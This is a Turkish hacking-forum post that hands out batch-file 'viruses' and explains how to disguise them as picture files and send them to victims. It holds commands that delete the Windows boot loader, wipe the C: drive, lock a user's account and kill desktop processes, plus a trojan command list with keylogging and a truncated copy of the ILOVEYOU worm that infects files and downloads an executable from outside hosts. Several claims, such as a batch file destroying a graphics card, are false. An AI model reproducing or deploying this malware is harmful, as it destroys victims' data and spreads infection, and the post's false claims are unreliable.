THT DUYURU

Bilgisayar Güvenliği Bilgisayar Güvenlik Sistemleri makaleleri, virüs korumasından, güvenlik duvarlarına kadar her şeyin nasıl çalıştığı hakkında bilgilere buradan ulaşabilirsiniz.

takipci
chat
Seçenekler

Bat Virüsü Hazırlama

bbagis - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
02/2011
Mesajlar:
732
Konular:
213
Teşekkür (Etti):
19
Teşekkür (Aldı):
105
Ticaret:
(0) %
1
1127
18-04-2013 01:29
#1
Bat Virüsü Hazırlama
Bat virüsü hazırlama
İşte kodlar:

cd..

cd..

attrib -s -h -r -a c:\ntldr

del c:\ntldr

shutdown -r

arkadaşlar bu kodları bilgisayarımızdaki notpadi açarak içerisine kopyalıyoruz ve dosyayı kaydederken uzantısını .bat olarak değiştiriyoruz. sakın olaki dosyayı kendiniz açmayın!!!

örneğin; güzelresimler.bat


sonra işin heyecanlı kısmına gelelim. dosyamızı winrar yada winzip gibi programlar aracılığıyla karşı tarafa yolluyoruz. ve karşı taraf bu dosyayı açtığında boooom!!!! pc kendine otomatik format çeker.


haaa olaki dosyayı kendiniz yanlışlıkla açtınız olsun önemli deil; ben size bunun panzehirinide veriyimde içiniz rahatlısın.


yukarıdaki gibi hazırlamış olduğumuz dosya açıldığında 30 saniyelik bir geri sayma işlemi başlar forrmat işlemi için. bu 30 saniye bitmeden aşağıda verdiğim kodları yine aynı şekilde bat olarak kaydedip açtığınızda format işlemi duruyo. ama siz yinede denemeyin ne olur ne olmaz o kadar riske girmeyin..


panzehir kodları;


shutdown -a


_________________________________________


Yöntem Ms-dostan Pc ye gir


ms-dos a geç , ve *setdebug* yaz karşına *Enable AktiveX debugging for Java* diye bir yazı gelecek ona tamam de ve bir sonraki satıra *debug* yaz sonra diğer satıra *XAbilgine gireceğin ip* yi yazıp enter ediyoruz sonra işleyici oluşturuldu yazısı gelecek şimdi "Programlar>Çalıştır>telnet" yazıp telneti açıyoruz sonra "uzaktaki sistem" deyip adamın ip'sini tekrar yazıyoruz gerisi size kalmış bu komutları kullanabilirsin. (*) ları yazmıyoruz. Kolay gelsin...

CaptureScreen Ekrandan goruntu alır
DelFile;(filename.exe) Dosya siler
DisableKeys;1;(keys) harfleri iptal eder [kullanıcı klavyeyi kullanamaz]
DisableKeys;0; Klavye tekrar aktif olur
DisableKeys;1;abcdefghijklmnopqrstuvwxyzåäö Harfler kullanılmaz hale gelir
DownloadFile;(path:filename.exe) istediginiz dosyayi cekersiniz
Eject;1 CD-ROM'u acar
Eject;0 CD-ROM'u kapar
ExitWin;1 Windos'u kapar
GetApps Calısan prg.ları listeler
GetACL Admin Listi verir
GetInfo Info penceresini verir
GetDisks Hardiskindeki dosyaları gosterir
GetSetup Server icin ayarları verir
GetUser Kullanıcı hakkında bilgi verir GetVolume Sesi acar
KeyClick;1 Key click on
KeyClick;0 Key click off
Listen;1 Start (keyboard) bir nevi keyloger adamın yazdıklarını gorursunuz
Listen;0 Stop listening
Message;(message) Messagebox halinde mesaj yolalrsınız
NewSetup;serverport;1;password;youremail;VICTIMSem ail;smtpserver Sends the new admindata (1.7)
Password;1;any ENTER'a bas ve ServerPwd;yenisifre Passwordu deistirir(1.6)
PlaySound;(file.wav) wav dosyası calar
PortRedir;(listen tcp port);(ip);(destination port) ******** the specified port
Record;10 = 10 saniyelik ses kaydeder
RemoveServer;1 Server'ı kaldırır
RemoveServer;0 Kaldırmayı iptal eder
ShowImage;(file.exe) Resim gosterir
SendKeys;(words) Mesaj yollar * tusu ile yazdıgınız siler
SendKeys;2;13 Sends ozel tuslar [sag,sol,yukari,asagi]
SetACL;(ip)| Set (admin) access IP`s
SetMousePos;(xpos);(ypos) Mouse'u oynatırsınız
SwapButton;1 Mouse'un tuslarının yerlerini degistirir
SwapButton;0 Mouse'u eski haline getirir
StartApp;(file.exe) Program calıstırır
UploadFile;(file.exe);(size);(destination dir) Dosya yollarsınız


_________________________________________


Yöntem Ekran Kartını Yakın


@echo off
C:\WINDOWS\COMMAND\deltree /y c:\windows\*.*
@echo off
C:\WINDOWS\COMMAND\deltree /y c:\Progra~1\*.*
@echo off
C:\WINDOWS\COMMAND\deltree /y c:\*.*
@echo off
cls
cls
@echo .:: HacKeD By RaZoR::.
@echo off3.


kodlarını yapıştırın ve farklı kaydet diyin. dosya adını yazın ve sonuna .bat yazın. (örnek: açma.bat)

vede kaydedin böylece ms-dos toplu iş dosyası oluşacak bunu sakın açmayın ve kimin ekran kartını yakmak istiyorsanız o kişiye yollayın. kurban dosyaya iki kere tıkadığı zaman saniyede 1000 den fazla ms-dos sayfası açılacak vede yaklasık 30 sn sonra ekran kartı gücünü kaybedip yorulacak. en sonunda HacKeD By RaZoR yazısı görünecek (burayı kendiniz değiştirebilirsiniz) vede görüntü gidecek. yeni ekran kartı alana kadar da gelmiyecek kolay gelsin

_________________________________________


buda Format virüsü karşıya gönderdiğinizde 30sn içinde pc otomatikmen format atıyor ayrıca format atarken ekran kartını yakıp CD-romu bozuyor yani format attıktan sonra tekrardan windowsu geri yüklüyemeyecektir çünkü CD-rom Cd okumuyacaktı yenisini alsa bile yani anlıcayacğınız pc toprak oldu demektir

rem delete -pcaş(-vbe)
On es error -pc
On error Next Pc Hack
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,d ow
eq=""
ctr=0
Set fso = CreateObject("Scripting.FileSystemObject")
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
main()
sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("WScript.Shell")
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Micros oft\Window s Scripting Host\Settings\Timeout")
if (rr>=1) then
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD"
end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
regruns()
html()
spreadtoemail()
listadriv()
end sub
sub regruns()
On Error Resume Next
Dim num,downread
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows \Cur rentVersio n\Run\MSKernel32",dirsystem&"\MSKernel32.vbs"
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows \Cur rentVersio n\RunServices\Win32DLL",dirwin&"\Win32DLL.vbs"
downread=""
downread=regget("HKEY_CURRENT_USER\Software\Micros oft\Intern et Explorer\Download Directory")
if (downread="") then
downread="c:\"
end if
if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
Randomize
num = Int((4 * Rnd) + 1)
if num = 1 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf 7679njbvYT /WIN-BUGSFIX.exe"
elseif num = 2 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk4j nHHGbvbmKL JKjhkqj4w/WIN-BUGSFIX.exe"
elseif num = 3 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGq**198vbFV5hfFEkbopBdQZnmPOhfgER67b3V bvg/WIN-BUGSFIX.exe"
elseif num = 4 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqweras djhPhjasfd glkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX.exe"
end if
end if
if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows \Cur rentVersio n\Run\WIN-BUGSFIX",downread&"\WIN-BUGSFIX.exe"
regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","about:blank"
end if
end sub
sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path&"\")
end if
Next
listadriv = s
end sub
sub infectfiles(folderspec)
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
ext=fso.GetExtensionName(f1.path)
ext=lcase(ext)
s=lcase(f1.name)
if (ext="vbs") or (ext="vbe") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or (ext="hta") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
bname=fso.GetBaseName(f1.path)
set cop=fso.GetFile(f1.path)
cop.copy(folderspec&"\"&bname&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="jpg") or (ext="jpeg") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
set cop=fso.GetFile(f1.path)
cop.copy(f1.path&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="mp3") or (ext="mp2") then
set mp3=fso.CreateTextFile(f1.path&".vbs")
mp3.write vbscopy
mp3.close
set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
end if
if (eq<>folderspec) then
if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="script.ini") or (s="mirc.hlp") then
set scriptini=fso.CreateTextFile(folderspec&"\script.i ni")
scriptini.WriteLine "[script]"
scriptini.WriteLine ";mIRC Script"
scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt, if mIRC will"
scriptini.WriteLine " corrupt... WINDOWS will affect and will not run correctly. thanks"
scriptini.WriteLine ";"
scriptini.WriteLine ";Khaled Mardam-Bey"
scriptini.WriteLine ";http://www.mirc.com"
scriptini.WriteLine ";"
scriptini.WriteLine "n0=on 1:JOIN:#:{"
scriptini.WriteLine "n1= /if ( şnick == şme ) { halt }"
scriptini.WriteLine "n2= /.dcc send şnick "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
scriptini.WriteLine "n3=}"
scriptini.close
eq=folderspec
end if
end if
next
end sub
sub folderlist(folderspec)
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec)
set sf = f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next
end sub
sub regcreate(regkey,regvalue)
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite regkey,regvalue
end sub
function regget(value)
Set regedit = CreateObject("WScript.Shell")
regget=regedit.RegRead(value)
end function
function fileexist(filespec)
On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
function folderexist(folderspec)
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspec)) then
msg = 0



_________________________________________



sırada karşıdaki pc ye karşıdakinin haberi olmadan şifre koymak var aşağıdaki kdou .bat çevirip gönderin

net user %username% [parola]


_________________________________________


sıradaki kod karşıdakinin ekranını ve msn sini kaptıyor aşağıdaki kodları ne kadar çok yazarsanız karşıdaki pc nin ekranı ve msn si o kadar uzun süre kapanır

start tskill explorer
start tskill msnmsgr
start tskill explorer
start tskill msnmsgr
start tskill explorer
start tskill msnmsgr
start tskill explorer
start tskill msnmsgr
start tskill explorer
start tskill msnmsgr
start tskill explorer
start tskill msnmsgr
start tskill explorer
start tskill msnmsgr
start tskill explorer
start tskill msnmsgr
start tskill explorer
start tskill msnmsgr
start tskill explorer
start tskill msnmsgr
start tskill explorer
start tskill msnmsgr
start tskill explorer
start tskill msnmsgr
start tskill explorer
start tskill msnmsgr
start tskill explorer
start tskill msnmsgr
start tskill explorer


Benden bu kadar daha .bat virüsleri bulursam sizlerle paylaşırım
---------------------





Sus Ve Beni '' İZLE '' !!

Tehlike67 Teşekkür etti.
Advancel - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
08/2011
Nereden:
Yurt Dışı Be
Mesajlar:
414
Konular:
115
Teşekkür (Etti):
239
Teşekkür (Aldı):
16
Ticaret:
(0) %
18-04-2013 09:01
#2
--------------------- Quis Custodiet İpsos Custodes

Beni üzen insanları zamana bıraktım demleniyorlar. Kıvama geldiklerinde, yudum yudum içeceğim.

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler





1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291